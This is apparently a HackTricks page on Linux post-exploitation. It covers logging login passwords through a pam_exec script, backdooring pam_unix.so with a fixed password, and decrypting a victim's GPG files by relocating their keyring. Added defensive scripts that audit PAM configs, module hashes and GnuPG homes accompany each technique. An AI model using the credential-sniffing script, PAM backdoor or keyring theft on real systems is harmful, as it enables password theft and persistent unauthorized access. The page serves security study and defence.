Linux Post-Exploitation
Reading time: 5 minutes
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Sniffing Logon Passwords with PAM
Let's configure a PAM module to log every password each user uses to log in. If you don't know what PAM is, check:
PAM - Pluggable Authentication Modules
For further details check the original post. This is just a summary:
Technique Overview: Pluggable Authentication Modules (PAM) offer flexibility in managing authentication on Unix-based systems. They can enhance security by allowing login processes to be customized, but they also pose risks if misused. This summary outlines a technique for capturing login credentials using PAM, along with mitigation strategies.
Capturing Credentials:
- A bash script named `toomanysecrets.sh` is crafted to log login attempts, capturing the date, username (`$PAM_USER`), password (via stdin), and remote host IP (`$PAM_RHOST`) to `/var/log/toomanysecrets.log`.
- The script is made executable and integrated into the PAM configuration (`common-auth`) using the `pam_exec.so` module with options to run quietly and expose the authentication token to the script.
- The approach demonstrates how a compromised Linux host can be exploited to log credentials discreetly.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```
```bash
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
```
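From the defender's side, the integration step above leaves a visible trace: a `pam_exec.so` directive carrying `expose_authtok` in a file under `/etc/pam.d/`. The following audit script is an added example, not code from the original post; it scans a PAM configuration directory for `pam_exec.so` directives and reports them with file and line number, singling out the `expose_authtok` ones. The directory it scans here is a constructed sample built in a temp dir (`DEMO_PAM_DIR` and the `log-session.sh` path are names chosen for this example), so it runs offline; point `audit_pam_dir` at `/etc/pam.d` on a real host.

```sh
#!/bin/sh
# Added example (not from the original post): audit a PAM configuration
# directory for pam_exec.so directives, and especially for expose_authtok,
# which makes pam_exec feed the cleartext password to the program on stdin.

# Usage: audit_pam_dir /etc/pam.d
# Prints one report line per finding as "<file>:<line>: <reason>: <directive>".
audit_pam_dir() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # Number every line, then drop comments and blank lines.
        grep -n '' "$f" | grep -v '^[0-9]*:[[:space:]]*#' | grep -v '^[0-9]*:[[:space:]]*$' |
        while IFS= read -r entry; do
            ln="${entry%%:*}"
            line="${entry#*:}"
            case "$line" in
                *pam_exec.so*expose_authtok*)
                    printf '%s:%s: pam_exec.so with expose_authtok (password leaves PAM): %s\n' "$f" "$ln" "$line" ;;
                *pam_exec.so*)
                    printf '%s:%s: pam_exec.so present, review the program it runs: %s\n' "$f" "$ln" "$line" ;;
            esac
        done
    done
}

# Helpers used by the checks below: number of findings / expose_authtok findings.
count_findings() { audit_pam_dir "$1" | grep -c . ; }
count_authtok()  { audit_pam_dir "$1" | grep -c 'expose_authtok' ; }

# --- Constructed sample tree so the audit can run offline -------------------
DEMO_PAM_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_PAM_DIR"' EXIT
# common-auth with a stock pam_unix line plus the directive from the technique above
cat > "$DEMO_PAM_DIR/common-auth" <<'EOF'
# constructed sample /etc/pam.d/common-auth
auth    [success=1 default=ignore]      pam_unix.so nullok
auth    optional    pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
auth    requisite                       pam_deny.so
EOF
# a pam_exec use without expose_authtok (hypothetical script) that still deserves a look
cat > "$DEMO_PAM_DIR/sshd" <<'EOF'
# constructed sample /etc/pam.d/sshd
@include common-auth
session optional    pam_exec.so /usr/local/sbin/log-session.sh
EOF

audit_pam_dir "$DEMO_PAM_DIR"
```

Run it periodically (or from a configuration-management check) and alert on any `expose_authtok` line; on most distributions no stock service file uses it, so a hit is worth an immediate look at the program path and at who last edited the file.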
Backdooring PAM
For more details check the original post. This is just a summary:
Pluggable Authentication Module (PAM) is a system used under Linux for user authentication. It operates on three main concepts: username, password, and service. Configuration files for each service are located in the `/etc/pam.d/` directory, where shared libraries handle authentication.
Objective: Modify PAM to allow authentication with a specific password, bypassing the actual user password. This focuses particularly on the `pam_unix.so` shared library used by the `common-auth` file, which is included by almost all services for password verification.
Steps for Modifying `pam_unix.so`:
- Locate the Authentication Directive in the `common-auth` file:
- The line responsible for checking the user's password calls `pam_unix.so`.
- Modify Source Code:
- Add a conditional statement in the `pam_unix_auth.c` source file that grants access if a predefined password is used; otherwise it proceeds with the usual authentication process.
- Recompile and Replace the modified `pam_unix.so` library in the appropriate directory.
- Testing:
- Access is granted across various services (login, ssh, sudo, su, screensaver) using the predefined password, while normal authentication processes remain unaffected.
tip
You can automate this process with https://github.com/zephrax/linux-pam-backdoor
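A replaced `pam_unix.so` does not show up in `/etc/pam.d/` at all, so the defensive check is file integrity: compare the installed PAM modules against a trusted baseline. The script below is an added example, not code from the original post or from the linked repository. `make_module_baseline` records a `sha256sum`-style baseline (hash, path) for a module directory and `check_module_baseline` reports any module that is missing or whose hash changed. The module directory and the files in it are a constructed sample under a temp dir (`DEMO_MODDIR` and `DEMO_BASELINE` are names chosen for this example) in which `pam_unix.so` is overwritten after the baseline is taken; on a real Debian or RHEL host the package manager already holds the equivalent baseline (`dpkg -V libpam-modules`, `rpm -V pam`).

```sh
#!/bin/sh
# Added example (not from the original post): detect a replaced PAM module by
# comparing installed files against a trusted hash baseline.

# Record a baseline: one "sha256  path" line per module in the given directory.
# Usage: make_module_baseline /lib/x86_64-linux-gnu/security > baseline.txt
make_module_baseline() {
    for m in "$1"/*.so; do
        [ -f "$m" ] && sha256sum "$m"
    done
}

# Verify a baseline. Prints "MODIFIED <path>" or "MISSING <path>" for each
# discrepancy and returns 1 if any was found, 0 if everything matched.
# Usage: check_module_baseline baseline.txt
check_module_baseline() {
    status=0
    while read -r expected path; do
        [ -n "$path" ] || continue
        if [ ! -f "$path" ]; then
            printf 'MISSING %s\n' "$path"
            status=1
            continue
        fi
        actual=$(sha256sum "$path" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            printf 'MODIFIED %s\n' "$path"
            status=1
        fi
    done < "$1"
    return "$status"
}

# --- Constructed sample: a stand-in module directory, baselined, then changed ---
DEMO_MODDIR=$(mktemp -d)
trap 'rm -rf "$DEMO_MODDIR"' EXIT
printf 'stand-in for the packaged pam_unix.so\n' > "$DEMO_MODDIR/pam_unix.so"
printf 'stand-in for the packaged pam_deny.so\n' > "$DEMO_MODDIR/pam_deny.so"
DEMO_BASELINE="$DEMO_MODDIR/baseline.txt"
make_module_baseline "$DEMO_MODDIR" > "$DEMO_BASELINE"

# Clean state: the check passes.
check_module_baseline "$DEMO_BASELINE" && echo "baseline clean"

# Simulate the recompiled-and-replaced library from the technique above, and
# remove a second module so both report kinds are exercised.
printf 'stand-in for a rebuilt pam_unix.so with extra logic\n' > "$DEMO_MODDIR/pam_unix.so"
rm -f "$DEMO_MODDIR/pam_deny.so"

# Tampered state: the check reports the changed and the missing module.
check_module_baseline "$DEMO_BASELINE" || echo "baseline violated"
```

Keep the baseline off the host (or signed), since an attacker who can replace `pam_unix.so` can also rewrite a local hash list; `debsums` and `rpm -V` have the same weakness if the package database itself is reachable.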
Decrypting GPG loot via homedir relocation
If you find an encrypted `.gpg` file and a user's `~/.gnupg` folder (pubring, private-keys, trustdb) but you can't decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home.
Typical errors you'll see without this: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (because GPG can't read/write the original homedir).
Workflow:
```bash
# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/
# 2) Ensure ownership & perms are sane for gnupg
chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg
chmod 700 /dev/shm/fakehome/.gnupg
# 3) Decrypt using the relocated homedir (either flag works)
GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
```
If the secret key material is present in `private-keys-v1.d`, GPG will unlock and decrypt without prompting for a passphrase (or it will prompt if the key is protected).
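What makes this workflow possible is that the key files in `private-keys-v1.d` can be read by whoever reaches the directory and, when stored unprotected, need no passphrase. The check below is an added example, not from the original post or from 0xdf's write-up; `audit_gnupg_home` flags a GnuPG home directory that is not mode 700 and any stored secret key that lacks passphrase protection. It relies on GnuPG's key file format, where a key in `private-keys-v1.d` is an S-expression tagged `protected-private-key` when passphrase-protected, `shadowed-private-key` when it is only a stub for a smartcard key, and plain `private-key` when stored in the clear. The keyring it inspects is a constructed sample in a temp dir (`DEMO_GNUPG` is a name chosen for this example) with a short text stand-in for each key type; run it against a real `~/.gnupg` to review users' keyrings.

```sh
#!/bin/sh
# Added example (not from the original post): audit a GnuPG home directory for
# loose permissions and for secret keys stored without passphrase protection.

# Usage: audit_gnupg_home /home/alice/.gnupg
# Prints one line per finding: "PERMS <dir> mode <octal>" or "UNPROTECTED <keyfile>".
audit_gnupg_home() {
    home="$1"
    mode=$(stat -c '%a' "$home")
    [ "$mode" = "700" ] || printf 'PERMS %s mode %s (expected 700)\n' "$home" "$mode"
    for k in "$home"/private-keys-v1.d/*.key; do
        [ -f "$k" ] || continue
        # -a treats the (partly binary) key files as text; the order of the tests
        # matters because "private-key" is a substring of the other two tags.
        if grep -aq 'protected-private-key' "$k"; then
            :   # passphrase-protected: fine
        elif grep -aq 'shadowed-private-key' "$k"; then
            :   # only a stub; the real key lives on a smartcard
        elif grep -aq 'private-key' "$k"; then
            printf 'UNPROTECTED %s\n' "$k"
        fi
    done
}

# Helper used by the checks below: number of findings for a directory.
count_gnupg_findings() { audit_gnupg_home "$1" | grep -c . ; }

# --- Constructed sample keyring (text stand-ins, not real key material) ------
DEMO_GNUPG=$(mktemp -d)/.gnupg
trap 'rm -rf "$(dirname "$DEMO_GNUPG")"' EXIT
mkdir -p "$DEMO_GNUPG/private-keys-v1.d"
chmod 755 "$DEMO_GNUPG"   # deliberately too open, so the PERMS finding fires
printf '(21:protected-private-key(3:rsa...))' > "$DEMO_GNUPG/private-keys-v1.d/AAAA.key"
printf '(11:private-key(3:rsa...))'           > "$DEMO_GNUPG/private-keys-v1.d/BBBB.key"
printf '(20:shadowed-private-key(3:rsa...))'  > "$DEMO_GNUPG/private-keys-v1.d/CCCC.key"

audit_gnupg_home "$DEMO_GNUPG"
```

An `UNPROTECTED` hit means the key is usable by anyone who can copy the directory, exactly as the workflow above shows, so the remediation is to re-protect the key with a passphrase (or move it to a token) and to tighten the directory to 700; a `PERMS` hit alone is already enough for GnuPG to print the "unsafe ownership" warning the section mentions.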
References
- 0xdf – HTB Environment (GPG homedir relocation to decrypt loot)
- GnuPG Manual – Home directory and GNUPGHOME